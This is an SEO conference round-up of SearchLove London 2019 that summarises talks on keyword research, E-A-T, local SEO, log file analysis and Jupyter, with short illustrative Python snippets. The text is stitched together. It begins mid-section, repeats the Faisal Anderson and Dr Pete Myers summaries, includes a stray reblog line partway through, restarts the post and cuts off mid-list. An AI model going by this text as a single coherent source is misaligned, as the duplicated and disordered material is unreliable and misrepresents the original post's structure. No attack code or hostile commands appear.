Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
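To make the three checks concrete, here is a minimal stdlib sketch over combined-format access log lines. The log lines and regex are illustrative only - real log formats vary by server, and a full notebook like Faisal's would be more robust:

```python
import re
from collections import Counter

# Invented access log lines in a common combined-ish format.
log_lines = [
    '66.249.66.1 - - [14/Oct/2019:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Googlebot/2.1"',
    '66.249.66.1 - - [14/Oct/2019:10:01:09 +0000] "GET /category?sort=price HTTP/1.1" 200 734 "-" "Googlebot/2.1"',
    '66.249.66.1 - - [14/Oct/2019:10:02:44 +0000] "GET /old-page HTTP/1.1" 404 120 "-" "Googlebot/2.1"',
    '10.0.0.5 - - [14/Oct/2019:10:03:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

pattern = re.compile(r'"GET (?P<url>\S+) HTTP[^"]*" (?P<status>\d{3}) .*"(?P<agent>[^"]*)"$')

hits = [m.groupdict() for m in (pattern.search(l) for l in log_lines) if m]
google = [h for h in hits if "Googlebot" in h["agent"]]

crawl_freq = Counter(h["url"] for h in google)          # crawl behaviour
param_urls = [u for u in crawl_freq if "?" in u]        # likely budget waste
errors = [h for h in google if h["status"] != "200"]    # site health

print(crawl_freq.most_common())
print("Parameter URLs crawled:", param_urls)
print("Non-200 responses:", [(h["url"], h["status"]) for h in errors])
```

Note that verifying the user-agent string alone isn't enough in production - Googlebot can be spoofed, so a reverse-DNS check is worth adding.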
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
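The formula drops straight into a notebook. A small sketch with invented keyword data (Dr Pete's deck is the authority on how he actually applies it):

```python
from math import sqrt

# Keywords with current rank and monthly search volume (illustrative numbers).
keywords = [
    {"kw": "john lewis", "rank": 1, "volume": 823000},
    {"kw": "desk lamp", "rank": 9, "volume": 12100},
    {"kw": "oak desk lamp", "rank": 2, "volume": 480},
]

def rankvol(rank, volume):
    """Dr Pete's RankVol: 1 / (rank x square root of volume)."""
    return 1 / (rank * sqrt(volume))

for k in keywords:
    k["rankvol"] = rankvol(k["rank"], k["volume"])

# Sorting by RankVol surfaces relevant, well-ranking terms rather than
# whatever happens to have the biggest raw volume (often brand noise).
for k in sorted(keywords, key=lambda k: k["rankvol"], reverse=True):
    print(f"{k['kw']:<15} rank {k['rank']:<3} vol {k['volume']:<7} rankvol {k['rankvol']:.6f}")
```

Here the huge-volume brand query sinks and the specific, well-ranking long-tail term rises to the top of the list.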
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
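For illustration, here is a rough sketch of generating such an hreflang XML sitemap in Python. The URLs and locales are invented, and Lindsay's deck links a ready-made script - this is just the shape of the output:

```python
# A mapping like the one exported from the Google Sheet Lindsay describes.
hreflang_map = {
    "https://example.com/": "en-gb",
    "https://example.com/us/": "en-us",
    "https://example.de/": "de-de",
}

def url_entry(loc, mapping):
    # Each <url> must list every alternate, including itself,
    # so the hreflang relationships are reciprocal.
    links = "\n".join(
        f'    <xhtml:link rel="alternate" hreflang="{lang}" href="{href}"/>'
        for href, lang in mapping.items()
    )
    return f"  <url>\n    <loc>{loc}</loc>\n{links}\n  </url>"

sitemap = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"\n'
    '        xmlns:xhtml="http://www.w3.org/1999/xhtml">\n'
    + "\n".join(url_entry(loc, hreflang_map) for loc in hreflang_map)
    + "\n</urlset>"
)
print(sitemap)
```

Regenerating the sitemap from the sheet whenever mappings change keeps the XML fall-back option in sync with the on-page implementation.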
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things fall because keywords can be really ambiguous. Often you can break these broad categories down into more specific ones.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue is unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by 34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
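One cheap way to operationalise those intent categories at scale is a modifier-based classifier. A rough sketch - the modifier lists here are my assumption, not Stacey's, and ambiguous queries still need a human (or SERP) check:

```python
# Illustrative modifier lists; extend these for your own vertical.
INFORMATIONAL = {"best", "how", "what", "guide", "review", "vs"}
TRANSACTIONAL = {"buy", "cheap", "price", "sale", "discount"}

def classify(keyword):
    """Bucket a keyword by intent based on the modifiers it contains."""
    tokens = set(keyword.lower().split())
    if tokens & TRANSACTIONAL:
        return "transactional"
    if tokens & INFORMATIONAL:
        return "informational"
    return "ambiguous"

queries = ["best ballet shoes", "buy ballet shoes", "ballet shoes"]
for q in queries:
    print(q, "->", classify(q))
```

The "ambiguous" bucket is where checking the live SERP (as Stacey recommends) matters most - the ranking page types tell you what Google thinks the intent is.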
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify elsewhere in the file that * (all user agents) is disallowed from /dont-crawl, Googlebot will only follow its own directive not to crawl /example and will still be able to crawl /dont-crawl.
The Google documentation, the robots.txt checker in GSC, and the open-source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
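You can see the non-cascading behaviour directly with Python's built-in parser - at least as urllib.robotparser implements user-agent matching, which is one of the interpretations worth testing against:

```python
from urllib import robotparser

# A specific Googlebot group plus a wildcard group, as in the example above.
rules = """
User-agent: Googlebot
Disallow: /example

User-agent: *
Disallow: /dont-crawl
""".splitlines()

rp = robotparser.RobotFileParser()
rp.parse(rules)

print(rp.can_fetch("Googlebot", "/example"))      # blocked by its own group
print(rp.can_fetch("Googlebot", "/dont-crawl"))   # allowed - the * group is ignored
print(rp.can_fetch("Bingbot", "/dont-crawl"))     # blocked - falls back to *
```

Running the same paths through GSC's checker and comparing the answers is a quick way to surface the disagreements mentioned above.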
We often have a lot of intuition about how things like PageRank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
anthonykrierion · 5 years
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference. All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year, make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts or the scientific consensus. Cite all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
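A quick sketch of tagging a GMB landing-page URL in Python - the parameter values below are a common convention for attributing these clicks to organic, not an official standard:

```python
from urllib.parse import urlencode, urlparse, urlunparse

def tag_for_gmb(url):
    """Append UTM parameters so GMB clicks report as organic in GA."""
    params = urlencode({
        "utm_source": "google",
        "utm_medium": "organic",
        "utm_campaign": "gmb-listing",
    })
    parts = urlparse(url)
    query = f"{parts.query}&{params}" if parts.query else params
    return urlunparse(parts._replace(query=query))

print(tag_for_gmb("https://example.com/"))
```

Paste the tagged URL into the website field of your GMB listing; without it, those visits stay lumped into direct.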
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
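To show what custom extraction boils down to, here is a stdlib-only sketch that pulls recommended product names and prices out of sample HTML. The markup and class names are invented - in practice you'd point Screaming Frog's custom extraction (XPath/CSS selectors) at the competitor's real markup:

```python
from html.parser import HTMLParser

# Illustrative competitor HTML; class names are assumptions.
html = """
<div class="recommended"><span class="name">Desk Lamp</span><span class="price">£29</span></div>
<div class="recommended"><span class="name">LED Bulb</span><span class="price">£6</span></div>
"""

class RecsParser(HTMLParser):
    """Collect {name, price} rows from elements with known class names."""
    def __init__(self):
        super().__init__()
        self.field = None
        self.rows = []

    def handle_starttag(self, tag, attrs):
        cls = dict(attrs).get("class")
        if cls == "recommended":
            self.rows.append({})
        elif cls in ("name", "price"):
            self.field = cls

    def handle_data(self, data):
        if self.field and self.rows:
            self.rows[-1][self.field] = data.strip()
            self.field = None

parser = RecsParser()
parser.feed(html)
print(parser.rows)
```

Run the same extraction against your own pages and the price/stock comparisons described above become a simple join of two tables.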
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
Merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
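The regex point is worth a concrete example. Here is a sketch of catching branded query permutations and misspellings with one pattern - the kind of thing that takes dozens of fragile lookup formulas in a spreadsheet (the brand variants below are invented for illustration):

```python
import re

# One pattern covering common misspellings/permutations of "distilled".
BRAND = re.compile(r"\bd[ei]st[iu]ll?ed\b", re.IGNORECASE)

queries = ["distilled seo", "distiled london", "destilled agency", "seo tips"]
branded = [q for q in queries if BRAND.search(q)]
non_branded = [q for q in queries if not BRAND.search(q)]
print("branded:", branded)
print("non-branded:", non_branded)
```

Splitting branded from non-branded queries this way makes reports like "non-brand organic growth" far more accurate than exact-match filtering.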
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient than Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
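Distilled's split-testing platform measures variant pages against a forecast counterfactual, which is well beyond a short snippet. Purely as a toy illustration of the underlying question - is the difference in organic sessions more than noise? - here is a simple permutation test on invented daily session counts:

```python
import random
from statistics import mean

# Illustrative daily organic sessions for control vs variant page groups.
control = [120, 132, 118, 125, 130, 122, 127]
variant = [138, 150, 141, 135, 149, 144, 140]

observed = mean(variant) - mean(control)

# Permutation test: how often does randomly relabelling the days
# produce a difference at least as large as the one we saw?
random.seed(42)
pooled = control + variant
trials = 10_000
count = 0
for _ in range(trials):
    random.shuffle(pooled)
    diff = mean(pooled[len(control):]) - mean(pooled[:len(control)])
    if diff >= observed:
        count += 1

p_value = count / trials
print(f"uplift: {observed:.1f} sessions/day, p = {p_value:.4f}")
```

A small p-value here only says the split is unlikely to be chance - a real SEO split test also needs proper page bucketing and a pre-test baseline, as Emily describes.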
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in screaming frog, the scraper API or chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check our Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Faisal uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low-value URLs (faceted nav, query params, etc.); there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
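The core of that kind of notebook can be sketched with nothing more than the standard library. The sketch below assumes Apache/Nginx "combined" log format and filters Googlebot requests, counting crawl frequency and response codes per URL — adjust the regex to whatever your server actually emits:

```python
import re
from collections import Counter

# Apache/Nginx "combined" log format (an assumption -- adjust to your server).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def googlebot_crawl_stats(lines):
    """Count Googlebot hits per URL and per (URL, status) pair."""
    hits, statuses = Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "Googlebot" not in m.group("ua"):
            # Not a Googlebot request. NB: a real analysis should also
            # verify the requesting IP, since user-agent strings can be faked.
            continue
        hits[m.group("path")] += 1
        statuses[(m.group("path"), m.group("status"))] += 1
    return hits, statuses
```

From the two counters you can read off the most and least crawled URLs, spot budget wasted on parameterised URLs, and flag paths that return inconsistent status codes — the three checks listed above.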
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
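Transcribed directly into code, the metric is a one-liner, which makes it easy to apply across an exported keyword set:

```python
import math

def rankvol(rank, volume):
    """RankVol = 1 / (rank * sqrt(volume)).

    Higher scores mark keywords that matter: ranks close to 1 score far
    better than huge-volume terms you barely rank for."""
    return 1 / (rank * math.sqrt(volume))
```

For example, sorting a keyword export with `sorted(keywords, key=lambda kw: rankvol(kw.rank, kw.volume), reverse=True)` surfaces the terms worth attention first.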
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
